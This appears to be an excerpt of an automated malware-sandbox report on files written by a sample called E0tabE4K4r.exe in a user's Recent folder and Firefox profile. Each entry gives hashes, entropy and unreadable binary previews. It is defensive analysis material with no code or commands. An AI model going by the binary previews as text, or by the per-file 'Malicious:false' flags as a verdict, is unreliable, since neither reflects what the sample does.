                                                                                                                                                  Preview:WKXEWu..._..W...2.+..=.@.v3E.....L.......W{'<.d..k............y]<9..FM,I.'b..}.<.....C.b..8.~H@......`.-.5s.(.f<..%....,......q.[p..U......iZ.....#+...&......f...^.#..o......KD....R6.*.b......(...?V.OiX..{m.5....:.tN<.........F.a<~o...cj.8..U0.\...A.R..KD.}..s.<w..f.....4.?&..8.9xE....=J...,..(o.+.@...[M....S.....'.-. .e...2{.......rMRM/.@x1^h......^.j.%.."...M'..^..[..UH...s..v.@1l..5..s...;$.=.:.....[.5....Mf@.k{...w.~.b.A4..d,EUK......M....bj....B..'..c.....-.hhl..s...Q[.....\....(....rB.RgG..k.p.Q....Ad.d..xX.WvG.......\r..Z..."..)*.$Y.-.$..ys.../.d.....L.D.7Gc..=~.M....8..G.+I.........s....LL.~.tI..&.}IV...GHk.../..+v...Z.;...^il..Q........g?...o..x$...E.eU.w....x.7.......d3B[..3JM5..E{... ......\...(M....3.....(L1N....Q....0$............io....r!Ro._...3...>=3..,.3...=C.8.F.OU$...U.........;....p .(..s......^.@>1...f....E4rb.j"7H........C.........YB....X.A.DH.v...........{...w....-.2...+........{b+....O...c..|d.:...l..P...ne50.,g.6}..

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WKXEWIOTXI.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.847809227556751
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:IVParBsIurFr61CD530sIoxfe7j4bc2XZMb5VUTvDb8xknPkoUTTmtftEP52bD:CParGd5JIoxfeccVUT7bKk8oMI5D
                                                                                                                                                  MD5:5EF4801BE1F4E9BFF2DABDD3B1A81B6F
                                                                                                                                                  SHA1:7801F2245693EE2BF6A43D97434E46E6B0E9F53E
                                                                                                                                                  SHA-256:DD0BB8F3A87FD3CE19863E3AB94D577522A4F280C961DE7E18C518C0847D24F0
                                                                                                                                                  SHA-512:DFF893A1F0C75ECE8E3A947DA291191DD280B94CE1BFF921185D77F5E5572504E3A1F066EA9825AC2C2EE8460EEEC1F0F413EFB573ADB1D38304A83C1734F3B8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:WKXEW...`.......hSu..LeD."P.2.'+Y.5.:...1.g!`|....|.....P..Y..}...;.e.T.........q.{........ L.}.ebo.1.G}.r7.U_....)....L..m=.6d.:*..I.4u(0...+o.E.K.#..`..c'.meB..)*..PvS..h.?..J.+D....IG..`.Vu./...K.S#...L...}...y....^.X..V..z......5.)(....D...UV..`Vbg.D....l.u.&.....FMrv._TO;.....p....{gm9....:.l[.Y.....?.=T.-...h..>rQ...+....!l.y[*.,E..6.\.*w.h..(70}..].{..'.9.uU(.BS...u..xZ..q.t......W.\.wc.Ht.....h..Nl.?....2..JG...+.<I..%|&..|...GB.W.0:f.y.0...t....]j..$.F.........Y.Y`=;.....>+C..B.L.S..._.<Lh.q.td..@..P..!.".....N:[&....L..G...m.R0...s..k.2.r#..g..Li.!t76..1.,.8/A.`.".H......".c+.O\&..4....l.;.eJ......G.~...V...K..G.I...2h.......Xq}.q.XD..b.(...[.D.'......\p..*./...U1......._.J"#.....t.}U..xK..G..z.......&....{..b.V0,..)......Z..+...}0..4'H$.p...[h..>}..!....K....G.......*.Cfz.9....2.X..T.Om.....[1.....+L.......g.....Q..g.....q..ox..i.s..g@L.!.,.@S..J_.....=..n.Q.._......Crs~..e|q.y2.|.a......P.\(u'.....Iy_.8.U.$a .3.eQ......f....4.kW...A.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\XPAZHQFTLE.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.847082679772964
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8sBtLiJklWF0KCAiCYcBpanEDjumCRjoWbCc1kxbc+HnHet6dXDLbUsh2bD:8MiJRFzLYiOlRoWjkxA6FTLws6D
                                                                                                                                                  MD5:5FDF2D2077EA1C5757BCC152E7746069
                                                                                                                                                  SHA1:F4A8AFDF64A5AB1FB54A92921DA817F5A6B7DB55
                                                                                                                                                  SHA-256:A81C8C61D0FBC47168B7F699016F3DA5A531175AD2AC2E16FB935E2A5C412DF1
                                                                                                                                                  SHA-512:2635240BEEB61B7DD37C0AAD7228CDCA0FF7F8F2EB0289C314A93DAD1499C7668BD4C1690E82F44E0A08F1A19C696897F69461CF2A9093783F69B5144674F233
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:XPAZH...IYL_.WV.....=...i...".Nx...,.Z.K{.%3....jt..B..w.C........Hci%....)8.v...M.].k..3.n.....W=.....9.a.G.~...O.Q.Z.L...+..n.fm...Iv.c...g..+c.....H.=v...yu0).A...[.\]E&..22....<..n..[2Q.8...d...d..7...{kr.&..9....:.s.|9..._+O..#R..qb}ET..U.....[Y.rSOT....}.UvS.r....r...V.....'l.G..0v...M.I.[..iZ..\..Js.E..../Xe.4..U=d....#9z..^.}ZR.g...6I....s.cs......j.>.-..p;....zD....OGP....0.;..?.*...$..t=.9I...?_.W.l..a..H.e.k."F#./..w.s.RL.'C ....#.:.....[.....P.8^.y..M.1`.R...D.a.fP....Y.@...9.....;.d.VR.&._|'....Xn$..f...../>P|.0 H5i..V........sH.....T..j.F~.....=...SZr.....?...s..,......c;..Vx.....#H...3.zo........=sP..h...H...{}......u1..b.Z.{U..... .......2..'}..=..c-.....Z...Q........w}.u..........f!l.+1....{?.C2.......K-Y+...D..WZP.+.(.WI%.@.....[.LkSnI/....s..37...hN/.x.G.mA...ul(.L.}{.>$.+"..#.....5..f.g_L...~}n..M.t.0c..O0.....-.I...G.5..+R.r\._]D..rDzqWd...Z/..`;..,3.9k-.)..).......t...{.......>N.W5...I.?[.?..R.z... .L...G.(..Zu(.{N..7U...\..

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\XQACHMZIHU.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.830258350430995
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BMj1NZI9f9gANSoW2aehGwXTGd9jQVK5bOYXmvMFzvsT2bD:089FgANSDkGwjMFrxQAD
                                                                                                                                                  MD5:CEFB933398E18977237D1065242BB769
                                                                                                                                                  SHA1:2DE23258280D123162CC053B4634388F48F6B49E
                                                                                                                                                  SHA-256:E3B50B3E7B837DACDA6A4621C5364C46E541F4F09878E13C2CBE487CE67FA641
                                                                                                                                                  SHA-512:CC8793DE07A6B2EDDDB8C943BF69FE9E809474131FE481336869B6F2A119AF34335AF454B2715E109A4B2A722CE1F5B009AE28A9D8048CD928F05C76400EBDC6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:XQACH75..`.<.1.).V..:.~..0..5....a..<.l.T#..=..........|..N........b....us:....\.....0.5..!...0..ZY..a...-?Q...@.DUls.....X.{.s..|./.......?..a.y__.%..dBx..'.C(|.+.L%.M....@q".g=-FF.../t".....(:..m..!x../....]^{..............._....8=..5..........E....x ....9...Dy".i.R..^.*7......yj*.5.)'...S.e. 8.P{.G#.v~`.|P..P<.4..T.....H<.*...n....A4......QS..w.w......l.7...l/.#*...[Y.gq..+.Ei}.;..c..=..Ngo;.........\.[.G.F..@..3M~....>;#.A...{.T...G..xV.u.....)f06.3W..u...C..!.&..e#6.._rR.YY.....+J.Wp4.I...O.?...R...2.=.<..f......Z18.......y....t..0"..9..* Mv..`.m.#p.E<......p..'....!.B1m.../..*#{..P#...1N.|...|eD5|D.L.B.N..t.....2..9l.._p.....t.1.-U...~...o.y/.rHVW.............t.n.`......Ksw.....U....a=..k..b..O..^/J|.(;...zw!......{.[...R(r.w>...D.5.X^./._.<..%...$..U.?M$..W..4..'..B..7.l...;@4.X...i]...h.8.x$.1nq.j......k h.H...>.V{vf....\ ...je.BY.]8..29...|.P..........L4...XX...3H.x.pZ.0.D-.!....}.J.(.$.....z..eQ[..6?.p.1".d..R..E.&../...U7m..~...

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\YPSIACHYXW.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.865622482678269
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:E+uaSjPtAz0XHuka8MpFsJHLH2B94CV9jVrH4xE6WIA2yjT0lyAnO4Bx2bD:E+ojlOAjMpFsRLWX4CV9jVT+ELYWW0D
                                                                                                                                                  MD5:88255A1DED97520B4F61A3ACE93A55BB
                                                                                                                                                  SHA1:7727B7B12C648CCBC97D068AD32C417AEB13DAE2
                                                                                                                                                  SHA-256:86A15B657E6B20C481C028FB11CB9657E63A6CCCD383186B9FD716C26FE59C2E
                                                                                                                                                  SHA-512:888D9A79F8E53E6670F0EB7FD0E431F07CD90D721EC9F7D5279CABAB45901F4DDEF8F15161673BF11274F4C26D5C8C2482D6AFAD07C809FA937FEF84FC3220AF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:YPSIAs........\T..A.@..X.P.[._.Q1....W.H2.'...G.*/~..'^.....Knsm.ZM..UR.6'.]8..T@I..MW.....{."..v......Y)].d.f,.4....|..\.... ]O...7.(Pn....#A...!..r.:.Q`.Hu...D.J.p!....i..(.Z@t.=Y.H.]/NY..#5zN....s....#s...$....7.*h.rk.S.\.r._`}#..J..1._.o0Q.......#Y..$.|L..y..........6.....Bf ..D{I.C=..(.Md.,{..1I.2E....t.<./...*W..[.........R..Lw.R..:..Q~Tna......K...'<*./....g..8....d..8..1|......(..r...cU;$...Q.+..<.h.{...i.W)>..].>H.e.....6..x'....n..)..&..._'...|.%D......@.^.u..^..:S..%...;.?..y....ia.=.;4....U.....w...j[......wc...O..+f9....{.....J"D....i..}}..#{=.......sQ..L[..Q->T._v4i.1b.7.....M...b......f....{...@.'.k....xU.._.......""`........6.U.kW.I..&;j.%....J.X.+z../.....,S.VW&......Z..j..9.........2..z|.....I.._{.=...du...h..I!.9...{.Nn......K..Qg...,8T.o)..'b6.X......a.FVe-..+..c..mX..h..y*`_eSQH[..n./..o.._.b.nM9.4:3..yrap.LLft.Qg...l..).}...r@A..k%fE.y~..o.(.h....6Y-.........6(.....O..Mh........HB....f.$.?u.u....)...N.e).w?.I&4

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\YPSIACHYXW.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.835180494303886
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:WK/xEUfGil201jViz3Ws5T/jESOzKdWyse9Pf/frX5SIwXLrfGTyy47y2bD:WK/KUfB1jUP/jZoKdWysQXFSIwXLzYyV
                                                                                                                                                  MD5:1AD1788F1870A980246672B95989117E
                                                                                                                                                  SHA1:9CE5B60D6A34698DC4AE1081F368970C52A4CF3C
                                                                                                                                                  SHA-256:F445CAE115A6C164BF0FADE47F02EC083093E2F82A04E0774CAA79EC475819C9
                                                                                                                                                  SHA-512:31B0723B9C1FE09511EC6648509813135248F19CE65D3B60EA46C12AB9BFE675F1A96F96DBE301E327AF0BE17A1CA4C9EF96B5C6456409A2A37401F1E51671C2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:YPSIA.j^...........8.BCD..h...&..V"l...i..h+..GZ&.}...i...U.89l..........x.K.p...0/^.3..... ........X.@5i.|h..lw.{.8EiPZ...iq.?.ZC...M...U...q5......f...@..H.W$?..2.&.RH.7."M...2..Ch.Ad..D.eAn.l..hc.......8.....K..z.....)...0.p?1..t...G5e.)c.^...q.d...L..${..[.K.\...~K.'.bZ&.......q.D...fs...X.....m..#..*)A..p.4.j. s..G........?...<..%.).....oV.......Z.#..=.\.6...'.i..U.... ..9.O.*..>ee.T.....-...^.=.65k..Y..g.W...`_.u@.e&.....8.....l.?1.P.3.! ...L.....y$.`.@.O.J...M..Cs...>.....I.|"h.U..Dy?...$.q.0.V...b..+,.{.l...qz.3..!.,9{.....@.y R.....5N...H1.9t..U.yw.<.p.s.{W....$R..T.......A...I.:,..u;.......&0tt-.3.t.\k..g.{]..pc.....6.....X,![$..^U6Y[-i.#|..6.5O.|b.t...........#..3..yiA.y#..M..y.S5...JJ6X..i.=...D8!x.0......P^.G...T.q...K.3u..gA.|}....%_'.f....@X-.c...5.?v.....+..j.}.{..N..m....... Q[Z.....@l.F*.u.5.)......(..c....0W.{~.E..:.......Pp.l...*..pErm.b..^x.]..*+.).J......Y/.7.4.E+-nw.....P$.s.:.Au..Q#.%..<.3....V&.k.9..:{Z7.HZ.....&.......t

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZIPXYXWIOY.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.840038675714978
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Het0zJa/vMHmaE85ntAP24HmwqGGDxMY5oghYAckT/s1cDnaGkDiI12bD:Het0FlGaPntAhHmZDxrzYAckDHaTGD
                                                                                                                                                  MD5:FBECBFA0BE340369F21F3640CEDACEE4
                                                                                                                                                  SHA1:DEF373D151E7EE37F732BBF6497112342E05E841
                                                                                                                                                  SHA-256:D8AE9A9883F2D4595D8E7DACAD53E1372936DC9095661F19FED9DC1F34CD6B6C
                                                                                                                                                  SHA-512:4C239EA222A47169471AF0CAC40B6BCCD382A74E7211F9DA4F9A5B575732157D970F43EBF6DD81FEB51B12ED2676AADFF852C4EB09A22AF0215291E8C3152031
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ZIPXY..5*.......gms......f :...x.#e.e-.8..8..W]S#..aV..N...4..1.+.B..]....>FFf..z...5..|....E..~..J..I.wI{....)..l.......%...8.e.."..8.6E..!..q......._.%.@O..\e.r...4U....kw............L.....zW'.).b..;..L.Y...>...9.j.F...S...........M....c....3M>1Lc....q.....&...l.CN...u.U..{....9f.i...+T_.-,N.. ..V..w.Z.'o.9^.a..#T..4..A_..q.`q.W.C.~..j..M..r.@..1o..(......Wv^}....!....I..'.t...$_..q4.g....\.-~.h......BC.....%r .zy..D..E..:..t.;s._F.....^M....$Y.5a..../...M....A*.."...o.7D..I..}0<[.r........fu.o.........[t(1..7.1..$..Yr....@_....].I.....|E.1...V....w.O8...c>9;&. .,.S."...JT.[8..../..%r...D..w..n..7.q...W.]@..W...2...E.....3.Z..Aqj8............I..>.5.Eu.a...3.i.7M..y."{C..wl...V...B!...iU.....5..x.(5l3..J-s(:+.)h....]aV2W......Q7.+Sw..k.Y.hl}wJ]m........jF.n`.X.h...-PN..|Y06.._N.......X..^.[.......A.4.ji.L....Q....*....=.$}..FN.m%....L.>....."..#[..f..}.b...:m. z.6..h.Z.G....q/8l~2..A....O7. .m -........(}..^..QHc....

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZIPXYXWIOY.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.847932026364303
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BHRt1efBqjNiQoq95uyVkSMMKEW0IzSKRSFQR17LXSS1MDv0bCzfR2bD:JRt1efBqRoq95u+3TKvH/RViS1MDs3D
                                                                                                                                                  MD5:96E9F2D58FADA29D45352A209698C301
                                                                                                                                                  SHA1:B9AC5EF900A4E589D4E6BEFFB3FFEB84C7334E10
                                                                                                                                                  SHA-256:157000BAC4EDB5925030C31A2E8291609E84DD2823866EB47C6E212B9C2DC82A
                                                                                                                                                  SHA-512:EE25076B385F3447D2580D6E3C90D228FBC8B12C5329C970688BEA724883DEE307724ACCA5D95C724104232F178B1D8B8D39541338322D901E198E24F69D9C2B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ZIPXYKEi0.8.... .>..9.....Z....v.Y=.7...Z...a223}D..}..%..;.Ou.......=.^.l.&...%.w.$q...7.n.l..s..$@......:..c,F..8.).w..3.fs.S...{>>....S....Ng..&h.(2D.Q.|.2G8.D.../U.d.$...m.".J.(I..D..Z...=(v..0...(...5iR(....\.)......Cm.#......&S....-......dX.:Z..I......=.l......e.x...?=:...;^~.....zCf..R... .....b..1.S....T.EAd.s.7.W..b..0Gq..x/..'d9....W.%..y~........3b........)4..F........`Cc.....o4..<..AS[......?....s:kH...26.*S.g..........O.o]......V#.....,E=.....J}... .q\9.Ga..Xv.9/.b.....H.0...M.-%...]sM...<....(..Y.$...j..H......,..6?T...>E.#..i.>.K0....i..v!.G.- m...;.J.,..S.....'.e.5...uW....X.....7..]^...U.g$.JQ.^$..n j...4..39.#R..I,...xA.`.G.>...?.G.zJ..b=$ ..l...]....Q.ns.Qj...;I_J...sCO2....|Ko.}......%.i..aN..N......C.Q.G.\.../m.A'.....`..$]&AY..........B.Y.G.A.?$.#v.v.$.b....F^*..n.N...0..$...!......d....di&2.O.jr..EM.VG....jQ..(.......e.O..a..b.H.)}y.v.Q.K.Z....)...2jNURH.......H.....|k...... .}.1.aEpA.M.:.u...../.`....*1..|..1._.\.0.8

                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZYMRZWDQUM.jpg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8431871520873875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxGTNwu7pWk22uUtS32tXKX663dcTFjz9odMV+sY4CDC+IuYZWK7t58M2bD:BsNwON2BUk3F6eyTFf9omXCDHIuwZ5YD
                                                                                                                                                  MD5:7C50FBFC886DCE890D38ABBAD1BEF136
                                                                                                                                                  SHA1:62478552D581FBFB7DDA331F6A91A0B0D9833EEE
                                                                                                                                                  SHA-256:4BCF050BE0438489B3684D76C1FB2324D3F1ADD9627AD820DDF4952E8D938367
                                                                                                                                                  SHA-512:D428FAA82D7D5EE0DD49396F0500F085870ED123F1233FEDEFADA69470F0D30AFAF01C79C8383E0487B2BAFF31A5AF73D58BF0AE1D3CB9E76060600E49A24AA7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:ZYMRZ...}.U...UC...%E..X..FG.2..y...yb.CB..g....1[..uv.^.h.:.y..?..3@^..:..Vc*..._....9}..8...b.3Y.).-.hx<.$O.....;.A..O.....@.{K ..Qf..r..9.Cn..J.........;...S.f..w..X.).6.Fz~.E.:.....S/....Lx.....a.L.d.......7..U.uJ.....e..P....R.....:I.%...r.k.!..p....{.FZ..!'.)W..O.....?...P..Mup.fP.j.c.._....._2....}..)0C........OI.v*..1&.g...u...,......_.o..-....D.5G....{2%(..........S..e.0Q..H.G...n.A..W..##...Jr......d.....3.$.Y=....-/..eW....)........K.1...7.W.....D..Lyi...3.Lc..W.O.8.XCx........b.......Ko. i89.~?.>...".tN...8D.i...*..Z[....f....^..a..=\..k..t..YSH......u......E`...8v..E.{............X.......].]6c.%.Y.B...._.....6Q..v.tG....@..?Y.v>....q~..z.l..w.2;};...F...J.D....R.......@\.>........K.J..p...6.U.\....}.T..I....[.M.....4..D.F".t....C......2[Z.....o..$.b;.^.^D..`W..u.VN..-zK...1....K..Hw s..Ya...B7...A...C..>....+.1.I.....\b.C..YC..."o.q......;0*{<}Q..7...E..2]...t..h.T..QX'.....P*.....>K.7.Y^....c..o.......... .[Jz..$...'H.-.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503498449.63479b8a-b3f3-4e99-9b36-3d051426e737.new-profile.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3869
                                                                                                                                                  Entropy (8bit):7.9516608057298095
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:zmiZT/0ST0pRtlZO6k7puzB6Yd4I2TahXLJCxkq:7ZQJphZOZ7p6/l2TadQxt
                                                                                                                                                  MD5:1D5852209436A93B804A758C977BB54A
                                                                                                                                                  SHA1:35988F189D440B1970F82EE3C32F3C4F30B3AB4B
                                                                                                                                                  SHA-256:AC72F64FF7EE744D1DE7D8FB193FF831ACF3A8E76A79C68F6AE696A2A136945F
                                                                                                                                                  SHA-512:64768E5B468D7A09F361325EEE8ECBD650C3E702343F08DC758E1EC2BFD9E55716450F9A0BFB9DA2BD5D13791D96D69A928417FB559F03985CA48BD7BAD054F6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz.[7...&.xM..KG....o#..7.TG.V..0l..N..s+T..@N..~.z:.*k0....4^......S..Ny.$.|{........R..E...q0....}P..V.$.s.%S.#....>x..N.K.......A0.3...q..9.....:05W......<a.K.....J.W..a.YF9....."].C..C....;..ENPD!.2... .3.....Fp..I...m.#..Y.:..1...{.#.79a.pi...;......s.x.....U..[..5....u6..{....CS..;-.%.H.w+#.0...Z)V.sqp..B8A..... . ..A3...O.V.$.`.....,....m.)%...5..L....F..i~.`...H.{.!He.`.G..;..b....R.vV......fB.A"......[.Z...0.0......._y......W6.".!X...K.:.=$.A..:....h.z!......y.>..7. ..6L.8..M..F..].BK...."G..c...Ig.[.w_p]?.,_.j..|.T..7.-.3.....r..W.f..=DP....K.c. .y=.Pk7c..8.....~.C.Q.J.D.... .W.....)..!s_.....$....`..:.j..vo......A...oO...|.v|.T.h...a..hz..NAm..(.. a..N........C.T...J....O.~s+..@d..Sb.Y..]..B.R.>...x.=b....X.=c].[.t#...H1..p=..~M.h....I.......{.. ....j$.ll)..\.kJA.N...<n.......a.0;.D.E...\.=.V...k..E0.r"y..K&.&..).!.E5c....y..;....%*._-.42-....._..s..(.Y_..>.Td..-.....6..**.VG....JAmT...-..i.4`:..4..l.IU..l.w._n...s.^....b.........

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503498454.ca69b6fc-ff9f-4d48-bb41-c9832fdd5179.event.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3945
                                                                                                                                                  Entropy (8bit):7.956957578401184
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:dWwtuw1Duh8o3jcvtdE3c9rwuIr4aOO2n5+sNiat:dteh8HCG0l4DOJSh
                                                                                                                                                  MD5:CA419446BA0954F54F8E876909B70083
                                                                                                                                                  SHA1:AA06944189FAD888A268E8B2DF6462F3F6498051
                                                                                                                                                  SHA-256:29317DDF3E9368AB08C83FBB168D2CC438D5BA85680E300AB8A45F3B5F78DEDE
                                                                                                                                                  SHA-512:CA3A993979340915D8DA582646A8DE2C07D9CDF3A01C3326BE7BA29861F59F6BA545071A3DC72488C7FEE7CA7C3B222B16ECC05F35543849B3248FD6AD6EA9B9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz.....d......[".........B.}..k.1...&.y.y......A9.zY......H..W...,....#.X...;..D..E..4....s...:........'D.3...G8Q..[{w]..vQQ....;7.h..}../P26..4:.#..'\u...N.8...#.E...?.'..Q.EA]>.......#......q..U..P.Z......5...E...!!.b....X.6.u..deps.....h.jC......`-.U..^...z....&g..jw.>.lS..o.!.+.T............Y.e]K.\..p."...*."..........R.....50....O...w..|.@..QB_.~![......Am..D.....F=....{..s7............~....B..q... ..Y_.......E.....-FM?..>R...l..[%T$)....1...I...)...h...S..N..F8..W`<...>..R......9.I.V.|W.'1...Ip..k?.........&..&(....z,....._.....aL...g....v6N.!.F.<P...<_w].YQ.....wW..;B..L.\..I\...~.IV..;&.....YI......;i....Y.....vV<Z......&.tq...\...X.]$..B.Vt..m`....$...O...B.8..|Y8M..@,.t..ML.7W.....g...&;.......?.......,.....Rh}.S..<..`....hq.S.O.....UA?...`..(.nV.4L....6......y._>..G&V.>.....s.%.)...)~f.w..U-y.8RP.b/..f.9..p.#6...T....XI\.G.......gN....N.J...XW.y..p2H.(dk.v.6I.5...{.W'...w.=.r.4....".......K.*.:..i[..X.H.....

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503498460.d6fc6761-8dca-414d-bcd1-bdb2a6101c74.main.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17499
                                                                                                                                                  Entropy (8bit):7.98932751221963
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:/josrMHCvOWqgN2ZR6aE5aJU7nEcxUkUt+I9z4gcaR5a:7ziC2PR3EcMEcOBoCzRceM
                                                                                                                                                  MD5:047E331ACDE7F0DA24A3A3D11D0C71C1
                                                                                                                                                  SHA1:FFC19F8A214164A082BD3D98FC0AAEE89D05B701
                                                                                                                                                  SHA-256:905AB16A078D6CF6541022FB215C3168D68195B972A161DE8B1926E1E4498076
                                                                                                                                                  SHA-512:DA998F965288541084EC483C387D869D8BDE186F2172CE3FCCF637564D4A9D974108BB050B49D3837C144459CDDB18EA34DF14E0B4CD6F731CEEE2E91F73DB3A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz..A..J...".....|....4..`h_.Zv......&..Piw....rc.V,U.3@...$..S~...xJv..4.i7...:.M.UV...F.C.Z..<.....z......['.d.i....M...=}...R..U..A+^.B(..'G....S}.|.h.),.H.`..W)U...$.sVboGyG......f6..@-.....5c.u.`=.d....3;5M.D:.<.R.+.t.6.&.<.T...#..&.-p.....+......C...."....n.....+{....N:\X..,.ud.).E..."w~.e.....zf.d........<I.<K/.eM.t[L..>..f.|.|..I{....C...q..p....}.j9..4.......(AIL....I..k.k.<.....f.;Q.k...3D ?J0.....G~..y...j....x.:...d....K.6m.......eYuYTjS......j.A............N....k...../2.....GM...|.:-.M.&-.>.7..o...|..Ix.^n..._.g...p...1bM..v...?@....o..j.#WN..L..U=..mX...(2fu.{.q.-.....k2....I..Q}?._@\..........1:...;...s.......9...1..!....(.Y.Sl..q.3:....g...].&.gcT...Qx....k.W.....s...$..t..Rf..Ly.7..0"A:6.'.tp......0....?*.K)..7...m.......EvA.Y..5...<Ge.~n.A..2|...._.[....<.SO.Dv...I.@P+.7F._yZJ.v..+......... .9.;N.GI>-.B.....PVd.T,.~...$.P...aE0F......[.C..y.p.C..D9V..S*.u...c...3>%......>v...=.R.]....u.........,......&...D...

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503498461.1e2e5577-cac5-4055-93e4-8fa3b7876f3a.first-shutdown.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17498
                                                                                                                                                  Entropy (8bit):7.989275871684683
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:jamykKjTXNPn+MZEpOrL3lHSt6qU/o5oUrS1brq:WmyjTXNpZ8OH3lH86q+oiUrS1e
                                                                                                                                                  MD5:198582E08E3545D6FC431A6CC4624DBC
                                                                                                                                                  SHA1:2A1EB7FFCEC661459EAC390240DDEA6661D1A11F
                                                                                                                                                  SHA-256:009FE428B507D522210C90DE763366487BDB7BF6D4E6F19BBDC64A72311D91A4
                                                                                                                                                  SHA-512:46C76F0F0855FF33B275F606437AFEF273E90C69104B4472EE3191CD8F2C16B364AED6DECCC8E969DFEED29C15D2658E91AC2B2CF7D359E994647548BA5ABAF6
                                                                                                                                                  Malicious:false
